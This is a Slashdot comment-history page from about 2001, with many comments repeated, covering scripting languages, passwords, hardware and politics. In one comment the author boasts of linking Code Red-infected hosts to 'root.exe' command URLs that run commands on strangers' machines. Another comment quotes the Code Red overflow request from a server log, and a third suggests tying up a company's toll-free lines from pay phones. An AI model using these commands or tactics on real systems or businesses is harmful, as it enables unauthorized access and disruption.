I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
What?! You are asking me to appreciate the gravity of this problem by couching it in monetarial terms instead of accounting of, real, nuclear warheads? On my "list of things to get worried about", "your federally insured bank has misplaced 70 million dollars" ranks slightly below "your government has misplaced a few thermonuclear weapons".
My mind is boggling here. I can't believe that anyone of any level of technical sophistication would think rot-13 was any type of advanced encryption. It's not even advanced for 100 years ago for fuck's sake! Any type of fixed cypher was outdated over 50 years ago and rot-13 is one the most trivivial of fixed cyphers. They might as well have used rot-0 (i.e. a=a, b=b, c=c, etc.) I'm still boggling. Do these companies use this crap because they're lazy or do they honestly think it is good technology?! Really, I'd like to know!
You mean, stolen. If a repo man can do it without being seen, so can a thief. It must suck to have bad security. Normally repo men do not work in hiding, but officially ask whoever runs the place to be handed over the machine.
Yup, most repo men will be fairly upfront (especially with something "owned" by a company and not an individual) and present their "warrant of reposession".
10. I had to quit smoking, it dropped my throughput by 5%
9. The mail server is in my office so I can't take naps with the door closed now
8. Ya know, I heard that at night they hook up the security alarm to a dropped packet detector
7. Ahhhhhhg, I'm blinded by the bandwidth!
6. Is this air plenum or non-plenum?
5. No more naked web surfing
4. Hey hot stuff, your packets are falling on my crotch, ya wanna go out later?
3. Every time I sneeze the DHCP server assigns my nose an IP
2. Cool, I can build a router with a mirror, some gum, and 3 rubber bands.
1. Hey, would you move, you're blocking my bandwidth!
Aside from the issues surrounding yet ANOTHER computer related technology named CSS (cascading style sheets and content scrambling system (DVDs)) what exactly is the advantage to a c-like scripting language? It would seem to me (and to anyone who had done a substantial amount of scripting and C programming) that the entire philosophy and modus operandi of C and scripting languages are completely and utterly different. Moreover, what precisely is wrong with the (myriad) scripting languages we have now? Are there those who cannot find something among bourne shell, awk, sed, perl, python, and others that they can understand and use? Perl 5 is about as easy a language to learn as exists, and Python is about the same. I don't see a valid niche where this new beast might make a happy living. It's simply redundant and unnecessary.
Every damn website wants a different password. For maximum security every password should be completely random and different.
Back in the real world....
I say, you have to know the level of importance of what the password is for. There's obviously a difference in importance to the root password for the database server you admin. at work and the password for your slashdot account. There's nothing wrong with using more easily remembered passwords for the low level stuff (various web sites and such) and only the highest level for the important stuff.
One thing that I do for the "huge sea of moderately unimportant passwords that I don't need to use often" is put them in a text file and encrypt it using pgp. On the rare occasions when I need the password I can unencrypt it and copy/paste.
That you were too lazy to copy an 800 byte image to your own server and link to that?
Yes, I recognize that such tasks are a huge chore. Hell, it would probably take an hour just to download the image, and another hour reading through documentation and sending emails to support lists to figure out how to move the image to a directory you can link to, and then probably at least half an hour (again, slogging through that documentation) to figure out how to change the image link in your html document. And then there's the cost issue. Hard drives aren't cheap, and 800 bytes is almost two full sectors! Plus you have the inconvenience of having 800 bytes of storage space on your system no longer available for other uses. All around it is just a day long pain in the ass ordeal. But, once you are finally finished the good news is that your site won't be able to be defaced like that anymore.
I don't see the big deal, I think they are well within their rights. Someone wrote a song, someone else is trying to profit by selling that song without paying royalties. End of story, they need to pay royalties. This is the way it's supposed to work, this is what it's all about. Despite what the RIAA, MPAA, and their stooges may have you believe, this is the reason we have copyright law. To protect one company from other companies who would profit by selling another's work without proper compensation. That is the real intellectual property threat.
Now in something like Napster I think the situation is much less clear cut, and I don't think it's a good comparison.
That's not so easy, especially if you have broadband. In many areas serviced by qwest, qwest is the only broadband carrier AND ISP. Moreover, they often do many little sneaky things to make sure it stays that way, or close to it. I am lucky enough that there are more ISPs in my area, and I will indeed switch, but many people are not so lucky.
That's completely pointless though. The reference to sourcecode is not apt. The "sourcecode" is already there, and it is for people who have the capability of using it (mathematicians). "Metamath" translates mathematical proofs into lower level "language", this would be like translating source code into (say) BASIC. Is that useful? Are there people who are going to be willing to try to understand the (now much more voluminous) source code when translated into BASIC who do not understand higher languages? I doubt it. Translating highly dense source code that makes use of many advanced programming techniques, libraries, specific aspects of the hardware environment, etc. into kajillions more lines of generic easier to read pseudo-code (or whatever) so that someone can hypothetically read the "source code" and see exactly how it works without understanding higher level programming concepts etc. seems like a waste of time. If you want to explain to someone who doesn't have the necessary background in a subject how something complicated works, you do so in English you don't try to explain every little detail. If someone has a burning need to understand every little detail of the proof of Fermat's Last Theorem, or the proof of the Fundamental Theorem of Calculus, etc. they should become mathematicians.
Formal mathematical proofs are usually only useful to mathematicians. For most people it suffices to tell them that the theory is true and has been proved to be so. I don't think it's going to help people to slog through abstract mathematics at unprecedented levels of detail. I think the public would be much better served with concise regular English descriptions of mathematical concepts and perhaps the how and why of certain mathematical proofs. Techies need math, they don't need to try to be mathematicians.
Hmmm, I don't know where you get that "poor performance" thing from. In my experience Perl is at least as fast as PHP, without mod_perl even. As for regular expressions, yes, that is an excellent point. Perl is very heavily wedded to REs and it shows. Sure, to some extent you get most of the same RE functionality in PHP, but it is much more cumbersome and annoying to use. Another great advantage of Perl (IMO) is the ease of creating modules and libraries and the huge base of modules out there. If you want to do something non-routine with Perl, it's a good bet that someone has written a module to help you out. There are so many modules for Perl that it is really astonishing the level and breadth of tasks that you can take on with Perl.
AGP is not a bus standard. AGP is for one card, and only one. Two AGP slots on one motherboard is sheer fantasy and would require a new "AGP standard". Notice that they don't call it an interface or a bus, they call it a "port". Which is what AGP is. It's a very high speed port to the memory. If you want AGP speeds in a bus, use 66-MHz 64-bit PCI (which is a bus, and is a standard).
Hmmm, not needed eh? Well, of course there's the standard gaming needs. Then there are similar needs, 3D rendering etc. With faster processors and faster busses, 3D rendering gets faster too (duh). 2D graphics also get a boost. Should be good for graphic artists. But, here's something us techies should be thinking about. Servers. Imagine a single box that can handle incredibly high usage loads (in webserver terms, think serving up gigabytes and millions of hits per day). Now imagine something somewhat similar. Routers. Switches. Gateways. Faster busses + faster ram + faster processors = better (and cheaper!) networks.
Here's a future scenario that may be made possible (in part) by faster busses: you create your own server and host it at home on a spare / old machine connected to the internet through your cheap gigabit ethernet connection. Fantasy you say? In a year or two after uber-fast busses are main stream, the price will drop enough to be available for use in budget boxes. Cheap high-speed networking equipment will enable faster links accross the world at fractions of present cost. A major part of the cost of modern high speed networking comes from the expense of maintaining and operating many exotic high-speed routers, switches, etc. Lowering those costs means more ultra-high-speed backbones, more high-speed links, and more high-speed connections to homes. Gigabit to the curb could very well be a reality, perhaps as soon as 2005.
Adoption of this type of technology for mainstream use could very will bring things like streaming video serving, data warehousing, mega popular web site hosting and serving, etc. into the realm of the hobbyist. As in times past, so in times future, what was once the realm of the elite and the wealthy will become commonplace. It's a good thing.
Yup. If I had to sum up the flakiness of the internet in one word it would be "routing". When every link works as it is supposed to internet routing is already strained nearly to the breaking point. Screw up a link here or there, or update a routing table or software and drop a router or two, and poof, major internet cluster fuck. Theoretically your packets are supposed to be routed differently if they can't reach a destination. But in practice that rarely occurs. Most of the time you get the same route sending your packets into the same big brown smelly hole like lemmings. Enjoy! The other major contributor to internet flakiness is the organization of the major links and interlinks. There are few uber-high bandwidth pipes and they are rarely organized to provide superior routing and redundancy.
There are a few hopeful signs on the horizon though. IPv6 should make routing a lot easier and give us a lot more operational "breathing room" which we can use for redundancy and robustness. There will also be a lot more high speed fiber optic links from hither and thither, which should help out quite a bit (especially to fix the "backhoe" vulnerability).
One, CERT isn't a private organization, they get tax money. Two, why buy something that's late and of inferior quality? Doesn't make a whole lot of sense.
And, for the record, socialism has worked out pretty well. Just ask the developed world. Or hadn't you noticed the socialist aspects of all modern industrialized nations? Welfare, unemployment benefits, social security, government funded roadways, medicare, medicaid, government grants to college students, the list goes on and on. And in Europe and Canada they are even more socialist! With their nationalized health care and whatnot. The majority of the government budgets for all industrialized nations is for "socialist" programs.
Communism however is a different ball of wax.
Imagine that, a slashdot troll who doesn't know his ass from a hole in the ground.
That's the point, you only have partial control. You can watch it or not. Maybe you can write or call in and complain or praise, but that's it. You can't say "that's too much money for that show, but I'd pay half, or that's too little I'd pay twice or three times as much".
Or..... you could go to a semi-out of the way block of pay phones, dial the 800 number on each phone (which you can do with no money since it's toll free) and leave the phones dangling off the hook. You use up their lines and you cost them money.
Slashdot Mirror
I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
set nat enable
set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
write
exit
Or, you could add a filter to deny incoming traffic on port 80.
riiiiight, it's really easy to accidentally hit someone with an arrow.
"It just went off when I was cleaning it (and after I had strung, drawn, aimed, and loosed it)."
Sheesh, who would have thought uninformed opinions would run rampant on slashdot?! Errrr, uh, nevermind then.
What?! You are asking me to appreciate the gravity of this problem by couching it in monetarial terms instead of accounting of, real, nuclear warheads? On my "list of things to get worried about", "your federally insured bank has misplaced 70 million dollars" ranks slightly below "your government has misplaced a few thermonuclear weapons".
Just checked my (apache) servers and I've found a total of 38 hits for default.ida?NNN...
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 325
One hit from each ip, earliest hit was 9am today, latest was 6pm (PST).
Here's a sample log file entry:
63.203.152.124 - - [19/Jul/2001:09:50:57 -0700] "GET
Hmmm, anyone daring enough to setup an IIS box, hit it with this url and see what happens?
My mind is boggling here. I can't believe that anyone of any level of technical sophistication would think rot-13 was any type of advanced encryption. It's not even advanced for 100 years ago for fuck's sake! Any type of fixed cypher was outdated over 50 years ago and rot-13 is one the most trivivial of fixed cyphers. They might as well have used rot-0 (i.e. a=a, b=b, c=c, etc.) I'm still boggling. Do these companies use this crap because they're lazy or do they honestly think it is good technology?! Really, I'd like to know!
You mean, stolen. If a repo man can do it without being seen, so can a thief. It must suck to have bad security. Normally repo men do not work in hiding, but officially ask whoever runs the place to be handed over the machine.
Yup, most repo men will be fairly upfront (especially with something "owned" by a company and not an individual) and present their "warrant of reposession".
10. I had to quit smoking, it dropped my throughput by 5%
9. The mail server is in my office so I can't take naps with the door closed now
8. Ya know, I heard that at night they hook up the security alarm to a dropped packet detector
7. Ahhhhhhg, I'm blinded by the bandwidth!
6. Is this air plenum or non-plenum?
5. No more naked web surfing
4. Hey hot stuff, your packets are falling on my crotch, ya wanna go out later?
3. Every time I sneeze the DHCP server assigns my nose an IP
2. Cool, I can build a router with a mirror, some gum, and 3 rubber bands.
1. Hey, would you move, you're blocking my bandwidth!
Aside from the issues surrounding yet ANOTHER computer related technology named CSS (cascading style sheets and content scrambling system (DVDs)) what exactly is the advantage to a c-like scripting language? It would seem to me (and to anyone who had done a substantial amount of scripting and C programming) that the entire philosophy and modus operandi of C and scripting languages are completely and utterly different. Moreover, what precisely is wrong with the (myriad) scripting languages we have now? Are there those who cannot find something among bourne shell, awk, sed, perl, python, and others that they can understand and use? Perl 5 is about as easy a language to learn as exists, and Python is about the same. I don't see a valid niche where this new beast might make a happy living. It's simply redundant and unnecessary.
Every damn website wants a different password. For maximum security every password should be completely random and different.
Back in the real world....
I say, you have to know the level of importance of what the password is for. There's obviously a difference in importance to the root password for the database server you admin. at work and the password for your slashdot account. There's nothing wrong with using more easily remembered passwords for the low level stuff (various web sites and such) and only the highest level for the important stuff.
One thing that I do for the "huge sea of moderately unimportant passwords that I don't need to use often" is put them in a text file and encrypt it using pgp. On the rare occasions when I need the password I can unencrypt it and copy/paste.
That you were too lazy to copy an 800 byte image to your own server and link to that? Yes, I recognize that such tasks are a huge chore. Hell, it would probably take an hour just to download the image, and another hour reading through documentation and sending emails to support lists to figure out how to move the image to a directory you can link to, and then probably at least half an hour (again, slogging through that documentation) to figure out how to change the image link in your html document. And then there's the cost issue. Hard drives aren't cheap, and 800 bytes is almost two full sectors! Plus you have the inconvenience of having 800 bytes of storage space on your system no longer available for other uses. All around it is just a day long pain in the ass ordeal. But, once you are finally finished the good news is that your site won't be able to be defaced like that anymore.
I dunno, it's hard to feel pathetic when your RDBMS knowledge boosts your salary by a few $10k per year.
I don't see the big deal, I think they are well within their rights. Someone wrote a song, someone else is trying to profit by selling that song without paying royalties. End of story, they need to pay royalties. This is the way it's supposed to work, this is what it's all about. Despite what the RIAA, MPAA, and their stooges may have you believe, this is the reason we have copyright law. To protect one company from other companies who would profit by selling another's work without proper compensation. That is the real intellectual property threat.
Now in something like Napster I think the situation is much less clear cut, and I don't think it's a good comparison.
That's not so easy, especially if you have broadband. In many areas serviced by qwest, qwest is the only broadband carrier AND ISP. Moreover, they often do many little sneaky things to make sure it stays that way, or close to it. I am lucky enough that there are more ISPs in my area, and I will indeed switch, but many people are not so lucky.
linkage from the horse's mouth.
That's completely pointless though. The reference to sourcecode is not apt. The "sourcecode" is already there, and it is for people who have the capability of using it (mathematicians). "Metamath" translates mathematical proofs into lower level "language", this would be like translating source code into (say) BASIC. Is that useful? Are there people who are going to be willing to try to understand the (now much more voluminous) source code when translated into BASIC who do not understand higher languages? I doubt it. Translating highly dense source code that makes use of many advanced programming techniques, libraries, specific aspects of the hardware environment, etc. into kajillions more lines of generic easier to read pseudo-code (or whatever) so that someone can hypothetically read the "source code" and see exactly how it works without understanding higher level programming concepts etc. seems like a waste of time. If you want to explain to someone who doesn't have the necessary background in a subject how something complicated works, you do so in English you don't try to explain every little detail. If someone has a burning need to understand every little detail of the proof of Fermat's Last Theorem, or the proof of the Fundamental Theorem of Calculus, etc. they should become mathematicians.
Formal mathematical proofs are usually only useful to mathematicians. For most people it suffices to tell them that the theory is true and has been proved to be so. I don't think it's going to help people to slog through abstract mathematics at unprecedented levels of detail. I think the public would be much better served with concise regular English descriptions of mathematical concepts and perhaps the how and why of certain mathematical proofs. Techies need math, they don't need to try to be mathematicians.
Hmmm, I don't know where you get that "poor performance" thing from. In my experience Perl is at least as fast as PHP, without mod_perl even. As for regular expressions, yes, that is an excellent point. Perl is very heavily wedded to REs and it shows. Sure, to some extent you get most of the same RE functionality in PHP, but it is much more cumbersome and annoying to use. Another great advantage of Perl (IMO) is the ease of creating modules and libraries and the huge base of modules out there. If you want to do something non-routine with Perl, it's a good bet that someone has written a module to help you out. There are so many modules for Perl that it is really astonishing the level and breadth of tasks that you can take on with Perl.
AGP is not a bus standard. AGP is for one card, and only one. Two AGP slots on one motherboard is sheer fantasy and would require a new "AGP standard". Notice that they don't call it an interface or a bus, they call it a "port". Which is what AGP is. It's a very high speed port to the memory. If you want AGP speeds in a bus, use 66-MHz 64-bit PCI (which is a bus, and is a standard).
Here's a future scenario that may be made possible (in part) by faster busses: you create your own server and host it at home on a spare / old machine connected to the internet through your cheap gigabit ethernet connection. Fantasy you say? In a year or two after uber-fast busses are main stream, the price will drop enough to be available for use in budget boxes. Cheap high-speed networking equipment will enable faster links accross the world at fractions of present cost. A major part of the cost of modern high speed networking comes from the expense of maintaining and operating many exotic high-speed routers, switches, etc. Lowering those costs means more ultra-high-speed backbones, more high-speed links, and more high-speed connections to homes. Gigabit to the curb could very well be a reality, perhaps as soon as 2005.
Adoption of this type of technology for mainstream use could very will bring things like streaming video serving, data warehousing, mega popular web site hosting and serving, etc. into the realm of the hobbyist. As in times past, so in times future, what was once the realm of the elite and the wealthy will become commonplace. It's a good thing.
There are a few hopeful signs on the horizon though. IPv6 should make routing a lot easier and give us a lot more operational "breathing room" which we can use for redundancy and robustness. There will also be a lot more high speed fiber optic links from hither and thither, which should help out quite a bit (especially to fix the "backhoe" vulnerability).
And, for the record, socialism has worked out pretty well. Just ask the developed world. Or hadn't you noticed the socialist aspects of all modern industrialized nations? Welfare, unemployment benefits, social security, government funded roadways, medicare, medicaid, government grants to college students, the list goes on and on. And in Europe and Canada they are even more socialist! With their nationalized health care and whatnot. The majority of the government budgets for all industrialized nations is for "socialist" programs.
Communism however is a different ball of wax.
Imagine that, a slashdot troll who doesn't know his ass from a hole in the ground.
That's the point, you only have partial control. You can watch it or not. Maybe you can write or call in and complain or praise, but that's it. You can't say "that's too much money for that show, but I'd pay half, or that's too little I'd pay twice or three times as much".
In case you were wondering, unixtime 123456789 occured on
Thu Nov 29 13:33:09 1973
(please do not waste mod points on this post, thanks)
Or..... you could go to a semi-out of the way block of pay phones, dial the 800 number on each phone (which you can do with no money since it's toll free) and leave the phones dangling off the hook. You use up their lines and you cost them money.